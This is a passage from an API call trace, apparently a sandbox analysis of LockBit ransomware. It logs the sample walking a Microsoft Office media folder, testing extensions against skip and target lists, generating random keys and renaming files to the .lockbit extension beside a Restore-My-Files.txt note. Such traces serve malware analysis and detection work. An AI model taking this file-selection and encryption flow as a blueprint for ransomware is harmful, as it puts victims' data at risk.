FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.752] free (_Block=0x1fa2ed8) [0199.752] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18187_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.752] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.752] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.752] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84c95f00, ftCreationTime.dwHighDateTime=0x1bdcf1e, ftLastAccessTime.dwLowDateTime=0xbcb67640, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x84c95f00, ftLastWriteTime.dwHighDateTime=0x1bdcf1e, nFileSizeHigh=0x0, nFileSizeLow=0x980, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18189_.WMF", cAlternateFileName="")) returned 1 [0199.752] lstrcmpiW (lpString1=".", lpString2="BD18189_.WMF") returned -1 [0199.752] lstrcmpiW (lpString1="..", lpString2="BD18189_.WMF") returned -1 [0199.752] PathFindExtensionW (pszPath="BD18189_.WMF") returned=".WMF" [0199.752] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.752] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.752] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.752] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.752] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.752] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.752] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.752] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.753] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.753] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18189_.WMF") returned 1 [0199.754] lstrcmpiW (lpString1="ntldr", lpString2="BD18189_.WMF") returned 1 [0199.754] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18189_.WMF") returned 1 [0199.754] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18189_.WMF") returned 1 [0199.754] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18189_.WMF") returned -1 [0199.754] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18189_.WMF") returned 1 [0199.754] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18189_.WMF") returned 1 [0199.754] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.754] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18189_.WMF") returned=".WMF" [0199.754] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.754] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.755] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.755] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.756] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.756] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.756] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18189_.WMF.lockbit") returned 79 [0199.756] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18189_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18189_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0199.757] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.757] malloc (_Size=0x40068) returned 0x3f70048 [0199.757] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=2432) returned 1 [0199.757] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.758] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0199.758] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.758] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0199.758] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0199.762] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18189_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18189_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.762] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.762] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.771] free (_Block=0x1fa2ed8) [0199.771] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18189_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.771] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.771] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.771] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea699700, ftCreationTime.dwHighDateTime=0x1bdfe4c, ftLastAccessTime.dwLowDateTime=0xbcb8d7a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xea699700, ftLastWriteTime.dwHighDateTime=0x1bdfe4c, nFileSizeHigh=0x0, nFileSizeLow=0x994, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18190_.WMF", cAlternateFileName="")) returned 1 [0199.771] lstrcmpiW (lpString1=".", lpString2="BD18190_.WMF") returned -1 [0199.771] lstrcmpiW (lpString1="..", lpString2="BD18190_.WMF") returned -1 [0199.771] PathFindExtensionW (pszPath="BD18190_.WMF") returned=".WMF" [0199.771] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.771] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.771] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.771] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.771] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.771] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.771] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.771] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.771] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.771] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.771] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.771] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.771] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.771] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.771] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.771] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.772] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.772] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18190_.WMF") returned 1 [0199.772] lstrcmpiW (lpString1="ntldr", lpString2="BD18190_.WMF") returned 1 [0199.773] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18190_.WMF") returned 1 [0199.773] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18190_.WMF") returned 1 [0199.773] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18190_.WMF") returned -1 [0199.773] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18190_.WMF") returned 1 [0199.773] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18190_.WMF") returned 1 [0199.773] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.773] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18190_.WMF") returned=".WMF" [0199.773] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.773] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.773] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.774] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.774] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18190_.WMF.lockbit") returned 79 [0199.774] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18190_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18190_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0199.775] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.775] malloc (_Size=0x40068) returned 0x3df0008 [0199.775] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2452) returned 1 [0199.775] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.776] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.776] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.776] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.776] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0199.778] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18190_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18190_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.778] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.778] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.780] free (_Block=0x1fa2ed8) [0199.780] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18190_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.780] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.780] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.780] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x171d3300, ftCreationTime.dwHighDateTime=0x1bdcf1e, ftLastAccessTime.dwLowDateTime=0xbcb8d7a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x171d3300, ftLastWriteTime.dwHighDateTime=0x1bdcf1e, nFileSizeHigh=0x0, nFileSizeLow=0xc9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18191_.WMF", cAlternateFileName="")) returned 1 [0199.780] lstrcmpiW (lpString1=".", lpString2="BD18191_.WMF") returned -1 [0199.780] lstrcmpiW (lpString1="..", lpString2="BD18191_.WMF") returned -1 [0199.780] PathFindExtensionW (pszPath="BD18191_.WMF") returned=".WMF" [0199.780] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.780] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.780] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.780] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.780] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.780] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.780] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.780] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.780] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.780] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.780] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.781] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.781] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18191_.WMF") returned 1 [0199.782] lstrcmpiW (lpString1="ntldr", lpString2="BD18191_.WMF") returned 1 [0199.782] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18191_.WMF") returned 1 [0199.782] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18191_.WMF") returned 1 [0199.782] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18191_.WMF") returned -1 [0199.782] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18191_.WMF") returned 1 [0199.782] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18191_.WMF") returned 1 [0199.782] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.782] PathFindExtensionW (pszPath="C:\\\\Program 